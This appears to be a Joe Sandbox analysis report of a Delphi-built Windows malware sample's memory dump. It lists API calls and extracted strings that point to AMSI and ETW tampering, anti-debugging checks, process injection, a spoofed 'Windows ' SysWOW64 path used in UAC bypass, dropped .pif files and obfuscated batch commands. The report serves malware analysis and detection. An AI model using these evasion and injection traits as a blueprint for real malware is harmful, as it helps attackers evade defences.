Part of subcall function 02B9DBB0: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B9DC30
Part of subcall function 02B9DBB0: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B9DC5C
Part of subcall function 02B9DBB0: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B9DC65

Part of subcall function 02B87E3C: GetFileAttributesA.KERNEL32(00000000,?,02BA2A49,ScanString,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanBuffer,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,Initialize), ref: 02B87E47

Part of subcall function 02B87FD0: CreateDirectoryA.KERNEL32(00000000,00000000,?,02BA2BE7,OpenSession,02BE137C,02BAAFD8,ScanString,02BE137C,02BAAFD8,Initialize,02BE137C,02BAAFD8,ScanString,02BE137C,02BAAFD8), ref: 02B87FDD

Part of subcall function 02B9DACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B9DB9E), ref: 02B9DB0B
Part of subcall function 02B9DACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B9DB45
Part of subcall function 02B9DACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B9DB72
Part of subcall function 02B9DACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B9DB7B

Part of subcall function 02B987A0: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02BE13A4,02B9A3C7,ScanString,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,Initialize,02BE13A4,02B9A77C,UacScan), ref: 02B987B4
Part of subcall function 02B987A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B987CE
Part of subcall function 02B987A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02BE13A4,02B9A3C7,ScanString,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,Initialize), ref: 02B9880A

Part of subcall function 02B9870C: LoadLibraryW.KERNEL32(amsi), ref: 02B98715
Part of subcall function 02B9870C: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B98774

Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanBuffer,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,02BAB330), ref: 02BA49B7

Part of subcall function 02B9DA44: RtlInitUnicodeString.NTDLL(?,?), ref: 02B9DA6C
Part of subcall function 02B9DA44: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B9DABE), ref: 02B9DA82
Part of subcall function 02B9DA44: NtDeleteFile.NTDLL(?), ref: 02B9DAA1

MoveFileA.KERNEL32(00000000,00000000), ref: 02BA4BB7
MoveFileA.KERNEL32(00000000,00000000), ref: 02BA4C0D

Strings

SetUnhandledExceptionFilter, xrefs: 02BAA336
sppc, xrefs: 02BA95B1, 02BA95E4, 02BA9617, 02BA964A, 02BAA55A, 02BAA58D
EnumServicesStatusExW, xrefs: 02BAA10A
DllGetActivationFactory, xrefs: 02B9F51A
SLGetSLIDList, xrefs: 02BA95CD
wintrust, xrefs: 02B9F0C7, 02B9F0FA, 02B9F12D
NtCreateSection, xrefs: 02BAA675
SLLoadApplicationPolicies, xrefs: 02BA9633
ieproxy, xrefs: 02B9EFC1, 02B9EFE8, 02B9F018
ScanBuffer, xrefs: 02B9EE73, 02B9F1CB, 02B9F3F5, 02B9F95C, 02B9FA69, 02B9FB81, 02B9FF55, 02BA00F3, 02BA0299, 02BA03B9, 02BA054E, 02BA0646, 02BA08AF, 02BA0A55, 02BA0BF1, 02BA0D07, 02BA0D95, 02BA10A9, 02BA134A, 02BA145B, 02BA15F8, 02BA19A3, 02BA1AAF, 02BA1CCD, 02BA1DEA, 02BA2105, 02BA21A6, 02BA231A, 02BA24DA, 02BA27FC, 02BA2BF3, 02BA2E92, 02BA2F23, 02BA32DD, 02BA34BF, 02BA3633, 02BA37B6, 02BA3832, 02BA39E9, 02BA3BF3, 02BA3E51, 02BA4083, 02BA42C7, 02BA450F, 02BA47C5, 02BA492B, 02BA4AC0, 02BA4DF8, 02BA5132, 02BA544B, 02BA57CB, 02BA5B04, 02BA5DB6, 02BA5FBB, 02BA6121, 02BA6295, 02BA6311, 02BA6EB4, 02BA6F45, 02BA7375, 02BA7508, 02BA7664, 02BA775C, 02BA7C79, 02BA7F46, 02BA80EC, 02BA8279, 02BA840D, 02BA858C, 02BA8803, 02BA88FB, 02BA8D17, 02BA8FF0, 02BA9164, 02BA939A, 02BA942C, 02BA9764, 02BA9B02, 02BAA031, 02BAA937
psapi, xrefs: 02BAA11E
UacInitialize, xrefs: 02B9EF3B, 02B9F602, 02B9FD45, 02BA3D59, 02BA41CF, 02BA49C8, 02BA4C84, 02BA503A, 02BA5527, 02BA703D, 02BA887F, 02BA8C9B
psapi, xrefs: 02BA988A
BCryptQueryProviderRegistration, xrefs: 02B9F389
endpointdlp, xrefs: 02BA9B8F, 02BA9BC2, 02BA9BF5, 02BA9C28
OpenSession, xrefs: 02B9ECE3, 02B9EED7, 02B9F7BF, 02B9F8E0, 02B9F9ED, 02B9FB05, 02B9FED9, 02BA0077, 02BA021D, 02BA033D, 02BA04D2, 02BA05CA, 02BA07B7, 02BA095D, 02BA0C8B, 02BA0EB9, 02BA102D, 02BA1150, 02BA12CE, 02BA1674, 02BA16F7, 02BA180F, 02BA1927, 02BA1A33, 02BA1C51, 02BA1D6E, 02BA200D, 02BA2089, 02BA229E, 02BA243E, 02BA2780, 02BA293B, 02BA2B55, 02BA2C6F, 02BA2F9F, 02BA343E, 02BA35B7, 02BA373A, 02BA3B77, 02BA3DD5, 02BA3F0F, 02BA424B, 02BA4493, 02BA4675, 02BA4749, 02BA48AF, 02BA4A44, 02BA4D7C, 02BA4F16, 02BA50B6, 02BA525B, 02BA53CF, 02BA561F, 02BA56D3, 02BA5990, 02BA5A88, 02BA5F3F, 02BA6219, 02BA638D, 02BA6523, 02BA66D3, 02BA6DBC, 02BA6FC1, 02BA71DA, 02BA727D, 02BA7410, 02BA77D8, 02BA7A74, 02BA7D71, 02BA7ECA, 02BA8070, 02BA81FD, 02BA8391, 02BA8510, 02BA8613, 02BA8787, 02BA8A05, 02BA8BF5, 02BA8EE6, 02BA906C, 02BA92A2, 02BA94A8, 02BA966C, 02BA995B, 02BA9A0A, 02BA9C4A, 02BA9E41, 02BA9F39, 02BAA3EB, 02BAA9B3
HotKey=, xrefs: 02BA6631
C:\Users\Public\aken.pif, xrefs: 02BA4B51
NtDeviceIoControlFile, xrefs: 02BAA0B0
FX.c, xrefs: 02BA46FB
I_QueryTagInformation, xrefs: 02BA898A
CreateProcessAsUserW, xrefs: 02BAA155, 02BAA173
EnumProcessModules, xrefs: 02BAA119
MiniDumpWriteDump, xrefs: 02BA899E
sppwmi, xrefs: 02BAA527
DlpNotifyPreDragDrop, xrefs: 02BA9B78
ntdll, xrefs: 02BA897B, 02BA89CB, 02BA89DF, 02BA9D53, 02BA9D86, 02BA9DB9, 02BA9DEC, 02BA9E1F, 02BAA5C0, 02BAA5F3, 02BAA626, 02BAA659, 02BAA68C, 02BAA6BF, 02BAA6F2, 02BAA725, 02BAA758, 02BAA78B, 02BAA7BE, 02BAA7F1, 02BAA824, 02BAA857, 02BAA88A
CreateProcessAsUserA, xrefs: 02BAA146
EnumServicesStatusA, xrefs: 02BAA0DD
RtlAllocateHeap, xrefs: 02BA9D6F, 02BA9DD5
C:\Users\Public\, xrefs: 02BA3183, 02BA54D0, 02BA6743
@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%, xrefs: 02BA484E
dbgcore, xrefs: 02BA89A3, 02BA89B7
D2^Tyj}~TVrgoij[Dkcxn}dmu, xrefs: 02B9FE37
sys.thgiseurt, xrefs: 02BA3ECC
EtwEventWrite, xrefs: 02BAA873
EnumServicesStatusExA, xrefs: 02BAA0FB
DllGetClassObject, xrefs: 02B9EFB0, 02B9F4E7, 02BA9840, 02BAA510
GetProxyDllInfo, xrefs: 02B9EFD7
http, xrefs: 02BA15D5
SLGatherMigrationBlob, xrefs: 02BAA543
C:\\Windows \\SysWOW64\\, xrefs: 02BA3ACE, 02BA3EE2
IconIndex=, xrefs: 02BA64FD
NtAccessCheck, xrefs: 02BAA741
Initialize, xrefs: 02B9EDAB, 02B9FCC9, 02B9FE5D, 02B9FFFB, 02BA01A1, 02BA0456, 02BA0AF9, 02BA0F35, 02BA13DF, 02BA14E9, 02BA1BD0, 02BA1F02, 02BA2222, 02BA2556, 02BA2704, 02BA2A5D, 02BA2E16, 02BA4FBE, 02BA5353, 02BA574F, 02BA5914, 02BA5B80, 02BA5CBE, 02BA5EC3, 02BA6E38, 02BA7AF0, 02BA8AFD, 02BA96E8, 02BA9A86, 02BA9FB5, 02BAA36F, 02BAA8BB
DllRegisterServer, xrefs: 02B9F001, 02B9F54D
CreateProcessA, xrefs: 02BAA128
SLIsGenuineLocalEx, xrefs: 02BA9600
NtMapViewOfSection, xrefs: 02BAA6A8
FlushInstructionCache, xrefs: 02BAA303
@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or, xrefs: 02BA4598
NtQueryInformationThread, xrefs: 02BAA60F
DlpGetWebSiteAccess, xrefs: 02BA9C11
spp, xrefs: 02BA9824, 02BA9857, 02BAA4F4
GetProcessMemoryInfo, xrefs: 02BA9873
EnumServicesStatusW, xrefs: 02BAA0EC
C:\\Users\\Public\\Libraries\\, xrefs: 02BA4B66, 02BA4BBC, 02BA58B7
advapi32, xrefs: 02BA898F
UacScan, xrefs: 02B9ED47, 02B9F586, 02B9F67E, 02B9FC4D, 02BA0833, 02BA0E11, 02BA1773, 02BA1E86, 02BA3097, 02BA3261, 02BA33C2, 02BA353B, 02BA36BE, 02BA388F, 02BA396D, 02BA3AFB, 02BA4007, 02BA43C4, 02BA45F9, 02BA52D7, 02BA5847, 02BA5A0C, 02BA5D3A, 02BA5E47, 02BA60A5, 02BA619D, 02BA6D40, 02BA70E2, 02BA72F9, 02BA748C, 02BA76E0, 02BA7B6C, 02BA7CF5, 02BA7E4E, 02BA7FF4, 02BA8181, 02BA8315, 02BA8494, 02BA870B, 02BA8B79, 02BA8D93, 02BA8F74, 02BA90E8, 02BA931E, 02BAA18E
WinHttp.WinHttpRequest.5.1, xrefs: 02BA17E9
UacUninitialize, xrefs: 02BA2D1E, 02BA301B, 02BA3113, 02BA38F1, 02BA3F8B
ScanString, xrefs: 02B9EE0F, 02B9F03A, 02B9F14F, 02B9F2E0, 02B9F471, 02B9F6FA, 02B9F83B, 02B9FDC1, 02BA09D9, 02BA0B75, 02BA0FB1, 02BA11CC, 02BA1248, 02BA1565, 02BA188B, 02BA1B54, 02BA1F91, 02BA23C2, 02BA25D2, 02BA2688, 02BA29B7, 02BA2AD9, 02BA2D9A, 02BA31E5, 02BA3CDD, 02BA4153, 02BA4348, 02BA4D00, 02BA4E9A, 02BA51DF, 02BA55A3, 02BA5C42, 02BA6428, 02BA659F, 02BA6657, 02BA6CC4, 02BA715E, 02BA75C5, 02BA7BE8, 02BA868F, 02BA8A81, 02BA8E6A, 02BA9226, 02BA9524, 02BA98DF, 02BA9CC6, 02BA9EBD, 02BAA467
BCryptRegisterProvider, xrefs: 02B9F3BC
tquery, xrefs: 02BA97F1
C:\\Windows \\SysWOW64\\svchost.exe, xrefs: 02BA36A8
SxTracerGetThreadContextDebug, xrefs: 02BA980D, 02BAA4DD
NtWriteVirtualMemory, xrefs: 02BAA7DA
NtQuerySystemInformation, xrefs: 02BAA0A1
NtWaitForSingleObject, xrefs: 02BA9DA2
URL=file:", xrefs: 02BA64A7
NtQuerySecurityObject, xrefs: 02BAA70E
NtReadVirtualMemory, xrefs: 02BAA6DB
GET, xrefs: 02BA1902
CryptSIPVerifyIndirectData, xrefs: 02B9F274, 02BA98A6
C:\Windows\System32\, xrefs: 02B9F8B7, 02BA70BB, 02BA7E03
NtQueryDirectoryFile, xrefs: 02BAA0BF
CreateProcessWithLogonW, xrefs: 02BAA164
@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%, xrefs: 02BA3361
mssip32, xrefs: 02B9F258, 02B9F28B, 02B9F2BE, 02BA98BD
BCryptVerifySignature, xrefs: 02B9F356, 02BA99D1
RtlCreateQueryDebugBuffer, xrefs: 02BA9E08
Kernel32, xrefs: 02BAA12D, 02BAA13C, 02BAA178
TrustOpenStores, xrefs: 02B9F0B0
C:\Users\Public\alpha.pif, xrefs: 02BA4B36
WriteVirtualMemory, xrefs: 02BAA2D0
LdrLoadDll, xrefs: 02BAA774
NtSetSecurityObject, xrefs: 02BA89C6
NtAlertResumeThread, xrefs: 02BA9D3C
DlpGetArchiveFileTraceInfo, xrefs: 02BA9BDE
CryptSIPGetSignedDataMsg, xrefs: 02B9F2A7
CreateProcessW, xrefs: 02BAA137
NtQueryVirtualMemory, xrefs: 02BAA5DC
VirtualProtect, xrefs: 02BAA26A
VirtualAlloc, xrefs: 02BAA204
NtOpenFile, xrefs: 02BAA80D
VirtualAllocEx, xrefs: 02BAA237
lld.SLITUTEN, xrefs: 02BA3AB8
WintrustAddActionID, xrefs: 02B9F0E3
LdrGetProcedureAddress, xrefs: 02BAA7A7
GZmMS1j, xrefs: 02B9ECBC
smartscreenps, xrefs: 02B9F4FE, 02B9F531, 02B9F564
[InternetShortcut], xrefs: 02BA6498
CryptSIPGetInfo, xrefs: 02B9F241
.url, xrefs: 02BA54DB
NtGetWriteWatch, xrefs: 02BAA5A9
SLGetGenuineInformation, xrefs: 02BA959A
RtlQueryProcessDebugInformation, xrefs: 02BAA0CE
RetailTracerEnable, xrefs: 02BA97DA
FindCertsByIssuer, xrefs: 02B9F116
MiniDumpReadDumpStream, xrefs: 02BA89B2
SLGetEncryptedPIDEx, xrefs: 02BAA576
NtOpenProcess, xrefs: 02BA89DA
bcrypt, xrefs: 02B9F36D, 02B9F3A0, 02B9F3D3, 02BA99E8
NEO.c, xrefs: 02BA4445
NtOpenObjectAuditAlarm, xrefs: 02BA8976
EtwEventWriteEx, xrefs: 02BAA840
Ntdll, xrefs: 02BAA0A6, 02BAA0B5, 02BAA0C4, 02BAA0D3
NtOpenSection, xrefs: 02BAA642
Advapi, xrefs: 02BAA0E2, 02BAA0F1, 02BAA100, 02BAA10F, 02BAA14B, 02BAA15A, 02BAA169
kernel32, xrefs: 02BAA21B, 02BAA24E, 02BAA281, 02BAA2B4, 02BAA2E7, 02BAA31A, 02BAA34D
DlpCheckIsCloudSyncApp, xrefs: 02BA9BAB
OpenProcess, xrefs: 02BAA29D

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: File$Library$AddressFreeLoadModuleProc$AttributesCloseCreateHandleMove$CheckDebuggerDeleteDirectoryInetInformationInitNameOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
API String ID: 3130226682-181751239
Opcode ID: 32c8684d3529b0eb55f6225c1a1e6ff44d221d71579bc7f024b0bd251e8c8641
Instruction ID: 098ad59d5bc330fa4f5b6df91f75e883efe6ca7e42804aa58f6b28ca9d16d745
Opcode Fuzzy Hash: 32c8684d3529b0eb55f6225c1a1e6ff44d221d71579bc7f024b0bd251e8c8641
Instruction Fuzzy Hash: F4241875A5015A8FDB25FB64CC90ADE73B6BF89304F1044E6E10DEB254EA31AE86CF50

Function 02B85A78 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B80000,02BAD790), ref: 02B85A94
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B80000,02BAD790), ref: 02B85AB2
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B80000,02BAD790), ref: 02B85AD0
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B85AEE
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B85B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B85B37
RegQueryValueExA.ADVAPI32(?,02B85CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B85B7D,?,80000001), ref: 02B85B55
RegCloseKey.ADVAPI32(?,02B85B84,00000000,?,?,00000000,02B85B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B85B77
lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B85B94
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B85BA1
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B85BA7
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B85BD2
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B85C19
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B85C29
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B85C51
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B85C61
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B85C87
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B85C97

Strings

Software\Borland\Locales, xrefs: 02B85AA8, 02B85AC6
Software\Borland\Delphi\Locales, xrefs: 02B85AE4

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: c5377b95b68045f544ac043e00e60ce5c447c9c4ad9617e02eee636367ff3a98
Instruction ID: 06649c1b97eb25c812fd971c42be33ce8a154b57e3a7e2509423c210bfd99aae
Opcode Fuzzy Hash: c5377b95b68045f544ac043e00e60ce5c447c9c4ad9617e02eee636367ff3a98
Instruction Fuzzy Hash: A7517271A5020C7AFB31EAA88C46FEFB7AD9B04744F8101E1A64CE6181DB749A44CF61

Function 02B9EBF0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KernelBase), ref: 02B9EC00
GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B9EC12
CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B9EC29

Strings

CheckRemoteDebuggerPresent, xrefs: 02B9EC0C
KernelBase, xrefs: 02B9EBFB

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: AddressCheckDebuggerHandleModulePresentProcRemote
String ID: CheckRemoteDebuggerPresent$KernelBase
API String ID: 35162468-539270669
Opcode ID: 416b73574a0ec690f650ed304071fd1df158ae3a425129fab880b352320edf44
Instruction ID: f8bd5b56870205a95a0b051ac978182eeba31eba343d15831c25445f4e4e8da2
Opcode Fuzzy Hash: 416b73574a0ec690f650ed304071fd1df158ae3a425129fab880b352320edf44
Instruction Fuzzy Hash: 7AF0A77090828CBBDF25E7A888897DCFBB99B05328F6403E5F464611D1E7754644C651

Function 02B9DBB0 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02B84ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B84EDA

RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B9DC80), ref: 02B9DBEB
NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B9DC80), ref: 02B9DC1B
NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B9DC30
NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B9DC5C
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B9DC65

Part of subcall function 02B84C0C: SysFreeString.OLEAUT32(02B9E950), ref: 02B84C1A

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

API ID: File$String$AllocCloseFreeInformationOpenQueryRead
String ID:
API String ID: 2659941336-0
Opcode ID: edf0f4e4a83c0194943acf65ede55866b49e02e84f9d3953b3aceaba14c0ba42
Instruction ID: 05f6ddadbb77b1b73633a9bd3330c3c4505ba153439df8648ee6345c9da9b01f
Opcode Fuzzy Hash: edf0f4e4a83c0194943acf65ede55866b49e02e84f9d3953b3aceaba14c0ba42
Instruction Fuzzy Hash: 7F21BE71A50309BEEB11EAA4CC46FDEB7BDAB49700F5004A1F704E7181DAB4AA058BA5

Function 02B9E2F8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B9E436

Strings

OpenSession, xrefs: 02B9E3D8
ScanBuffer, xrefs: 02B9E37F
Initialize, xrefs: 02B9E326

Memory Dump Source

Source File: 00000004.00000002.1595625508.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true

Associated: 00000004.00000002.1595603898.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1595794575.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1596027769.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b80000_x.jbxd

Similarity

